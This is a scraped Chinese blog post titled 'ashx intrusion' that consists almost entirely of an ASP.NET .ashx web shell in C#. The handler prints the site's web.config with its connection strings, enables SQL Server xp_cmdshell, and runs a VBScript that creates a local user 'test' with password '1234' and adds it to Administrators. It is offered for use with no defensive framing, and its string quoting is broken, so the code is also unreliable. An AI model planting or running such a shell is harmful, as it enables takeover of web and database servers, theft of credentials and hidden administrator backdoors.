zoukankan      html  css  js  c++  java

  • ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    public class TextLd : IHttpHandler
    {
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    case "1": WriteVbs(context); break;
    case "2":
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell
    break;
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    default:
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }
  • 相关阅读:
    机器学习【工具】:Numpy
    机器学习【算法】:KNN近邻
    【笔记】:字典内部剖析
    【笔记】:谁偷了我的内存?
    什么是RESTful框架
    音频下载服务
    【模块】:Requests(二)
    【模块】:Weakref
    异步Web服务(二)
    【Win10】UAP/UWP/通用 开发之 RelativePanel
  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html
Copyright © 2011-2022 走看看